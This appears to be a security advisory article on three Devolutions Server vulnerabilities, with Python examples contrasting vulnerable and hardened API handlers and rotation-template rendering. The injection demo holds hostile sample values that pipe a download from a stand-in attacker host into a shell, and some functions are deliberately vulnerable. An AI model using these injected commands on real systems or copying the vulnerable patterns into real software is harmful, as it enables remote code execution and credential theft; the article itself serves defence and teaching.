Devolutions Server: Three Medium-Severity Flaws Disclosed Together

Key findings
- Three medium-severity vulnerabilities in Devolutions Server disclosed on June 8, 2026.
- CVE-2026-10787 allows enumeration of deleted user group metadata due to missing authorization.
- CVE-2026-10786 enables obtaining cleartext credentials for ticketing integrations.
- CVE-2026-10544 permits arbitrary command execution on PAM-managed systems by a user who already has write access to a vault.
- CVE-2026-10787 and CVE-2026-10786 affect Devolutions Server 2026.2.4.0 and 2026.1.20.0 and earlier; CVE-2026-10544 affects Devolutions Server 2026.2.4.
Devolutions Server, a remote access and credential management product, is affected by three medium-severity vulnerabilities disclosed together on June 8, 2026. Each sits in a different part of the server: a missing authorization check on an API endpoint, an access control gap on integration settings, and missing input neutralization in PAM password rotation templates that turns into command execution on managed hosts.
The first, CVE-2026-10787, is a missing authorization check in the deleted user groups API. Because the endpoint only verifies that the caller is authenticated, not that the caller holds a role entitled to read group administration data, a low-privileged user can enumerate metadata of deleted user groups with a crafted API request. On its own this is reconnaissance rather than compromise, but the names and membership details of groups that were removed can reveal organisational structure and past privileged roles that an attacker would otherwise not see.
The second, CVE-2026-10786, is improper access control on the ticketing integration settings. A crafted API request from an authenticated, low-privileged user returns the credentials of the configured ticketing integrations in cleartext. The practical consequence is that a credential read this way remains valid after the server is patched: it has to be rotated on the ticketing system side, and access there should be reviewed for use from unexpected sources.
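The pattern common to the two API flaws above is an endpoint that treats "authenticated" as "authorized". The following is an added illustration, not Devolutions' code or API: two hypothetical handlers (a deleted-groups listing and a ticketing-settings read) in their vulnerable form, where any session can call them, beside a hardened form that enforces a role and never returns the integration password at all. Role names, endpoint data and the `Caller` type are all assumptions for the example.

```python
"""Authorization at the endpoint, as an added example (hypothetical code,
not Devolutions' own). Two handlers stand in for a deleted-user-groups
listing and a ticketing-settings read. The "vulnerable" pair treats an
authenticated session as sufficient; the "hardened" pair enforces a role
and never returns the integration password to any API client."""
from dataclasses import dataclass


class Forbidden(Exception):
    """Raised when the caller lacks the role an endpoint requires."""


@dataclass(frozen=True)
class Caller:
    name: str
    roles: frozenset


# Constructed sample state standing in for the server's database.
DELETED_GROUPS = [
    {"id": 17, "name": "finance-admins", "deleted_by": "alice", "members": 12},
    {"id": 23, "name": "dc-operators", "deleted_by": "alice", "members": 4},
]
TICKETING_SETTINGS = {
    "provider": "example-ticketing",           # hypothetical integration
    "url": "https://tickets.example.internal",
    "username": "svc-dvls",
    "password": "Hunter2!",                    # must never reach an API client
}


# --- vulnerable pattern: authenticated is treated as authorized ----------
def deleted_groups_vulnerable(caller: Caller) -> list:
    # No role check: every logged-in user sees who was in which group.
    return [dict(g) for g in DELETED_GROUPS]


def ticketing_settings_vulnerable(caller: Caller) -> dict:
    # Returns the stored record as-is, cleartext password included.
    return dict(TICKETING_SETTINGS)


# --- hardened pattern: explicit role check plus secret redaction ---------
def require_role(caller: Caller, role: str) -> None:
    if role not in caller.roles:
        raise Forbidden(f"{caller.name} lacks role {role!r}")


def deleted_groups_hardened(caller: Caller) -> list:
    require_role(caller, "administrator")
    return [dict(g) for g in DELETED_GROUPS]


def ticketing_settings_hardened(caller: Caller) -> dict:
    require_role(caller, "administrator")
    # Even administrators get a redacted view: the password is write-only
    # from the API's point of view and is only ever used server-side.
    view = {k: v for k, v in TICKETING_SETTINGS.items() if k != "password"}
    view["password_set"] = bool(TICKETING_SETTINGS.get("password"))
    return view


def denied(handler, caller: Caller) -> bool:
    """True if the handler refuses the caller."""
    try:
        handler(caller)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    low = Caller("bob", frozenset({"user"}))
    admin = Caller("alice", frozenset({"administrator"}))
    print("vulnerable leaks password to low-priv user:",
          "password" in ticketing_settings_vulnerable(low))
    print("hardened denies low-priv user:", denied(ticketing_settings_hardened, low))
    print("hardened admin view:", ticketing_settings_hardened(admin))
```

The redaction step matters as much as the role check: once a settings endpoint returns a stored secret to anyone, every future authorization bug on that endpoint becomes a credential leak, whereas a write-only secret stays server-side regardless.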
The third, CVE-2026-10544, has the widest blast radius despite sharing the medium rating. It is described as improper neutralization of special elements in the built-in PAM provider's password rotation templates, which is the CWE wording for command injection: template content or substituted values reach a command interpreter on the managed system without being neutralized. An authenticated user with write access to a vault can use this to run arbitrary commands on every system the affected PAM provider rotates credentials for, with whatever privileges the rotation account holds there, which for password rotation is typically administrative. The precondition (vault write access) narrows the attacker population, but that is a common level of access for ordinary operators, so it should be treated as an insider or stolen-session path to full compromise of managed hosts.
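To make the rotation-template flaw concrete, here is an added example of the general pattern, not Devolutions' code and not its real template format (the `{placeholder}` syntax, the `passwd-tool` program and the allowlist are assumptions). It renders a hypothetical rotation template the vulnerable way, as one string destined for a shell, and the hardened way, as an argv list built token by token with the program and literal tokens validated, so neither a hostile password value nor a hostile template edit by a vault writer can smuggle in extra commands.

```python
"""Command injection through a rotation template, as an added example
(hypothetical, not Devolutions' template format or code). A template is
operator-authored text with placeholders that the server fills in and
then runs on the managed host. Rendering it as one string and handing
that to a shell is the injection sink; tokenising first and passing
argv without a shell is the fix."""
import re
import shlex
import subprocess

# Constructed template in a hypothetical placeholder syntax.
TEMPLATE = "passwd-tool --user {username} --new {password}"

# Programs a template may invoke (hypothetical allowlist). This stops a
# vault writer from pointing a template at an arbitrary binary.
ALLOWED_PROGRAMS = {"passwd-tool", "/usr/sbin/chpasswd"}

PLACEHOLDER = re.compile(r"^\{(\w+)\}$")
# Literal template tokens: no quotes, braces, whitespace or shell metacharacters.
LITERAL_TOKEN = re.compile(r"^[A-Za-z0-9_./=@:-]+$")


def render_vulnerable(template: str, values: dict) -> str:
    """Plain substitution into one command line. The caller would then do
    subprocess.run(result, shell=True), so quotes, ';' and $(...) in the
    new password, or in the template itself, are interpreted by the shell
    on the managed host."""
    return template.format(**values)


def render_hardened(template: str, values: dict) -> list:
    """Tokenise the template, then substitute each placeholder as exactly
    one argv element. Placeholders must be standalone tokens; every
    literal token is checked against LITERAL_TOKEN and the program against
    ALLOWED_PROGRAMS. The shell never sees the substituted values."""
    argv = []
    for token in shlex.split(template):
        m = PLACEHOLDER.match(token)
        if m:
            name = m.group(1)
            if name not in values:
                raise ValueError(f"unknown placeholder {name!r}")
            argv.append(str(values[name]))  # one argument, never re-parsed
        elif LITERAL_TOKEN.match(token):
            argv.append(token)
        else:
            raise ValueError(f"template token not allowed: {token!r}")
    if not argv or argv[0] not in ALLOWED_PROGRAMS:
        raise ValueError(f"program not allowed: {argv[:1]}")
    return argv


def rejected(template: str, values: dict) -> bool:
    """True if the hardened renderer refuses the template."""
    try:
        render_hardened(template, values)
    except ValueError:
        return True
    return False


def rotate(argv: list) -> subprocess.CompletedProcess:
    """Run a rendered argv locally without a shell. A real PAM provider
    would execute on the managed system over SSH or WinRM, which must
    likewise carry argv rather than a joined command string."""
    return subprocess.run(argv, shell=False, capture_output=True, text=True)


if __name__ == "__main__":
    # Constructed hostile password value; attacker.test is a reserved name.
    values = {"username": "svc-db",
              "password": "x'; curl http://attacker.test/p | sh; '"}
    print("vulnerable command line:", render_vulnerable(TEMPLATE, values))
    print("hardened argv:", render_hardened(TEMPLATE, values))
    print("malicious template rejected:",
          rejected("passwd-tool --user {username}; curl attacker.test | sh", values))
```

Two points of the design carry over to any rotation engine: the substituted secret must become a single argument and never be re-parsed, and the template itself must be treated as untrusted input, since anyone who can write to the vault that owns it can edit it.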
Affected versions differ by CVE. CVE-2026-10787 and CVE-2026-10786 affect Devolutions Server 2026.2.4.0 and 2026.1.20.0 and earlier; CVE-2026-10544 affects Devolutions Server 2026.2.4. Because the ranges overlap, a single upgrade addresses all three; the fixed versions are not stated here and should be taken from Devolutions' own advisory.
Administrators should upgrade to the version Devolutions designates as fixed and then deal with what the flaws may already have exposed: rotate the credentials of every configured ticketing integration, since a cleartext read before patching cannot be undone by the patch; audit which accounts hold write access to vaults backing the built-in PAM provider and review those vaults' password rotation templates for content that does not belong there; and check API access logs for low-privileged accounts calling the deleted user groups or ticketing settings endpoints. Disclosing three access control and input handling flaws at once is a reminder that the authorization model of a credential server needs regular review, not just its patch level.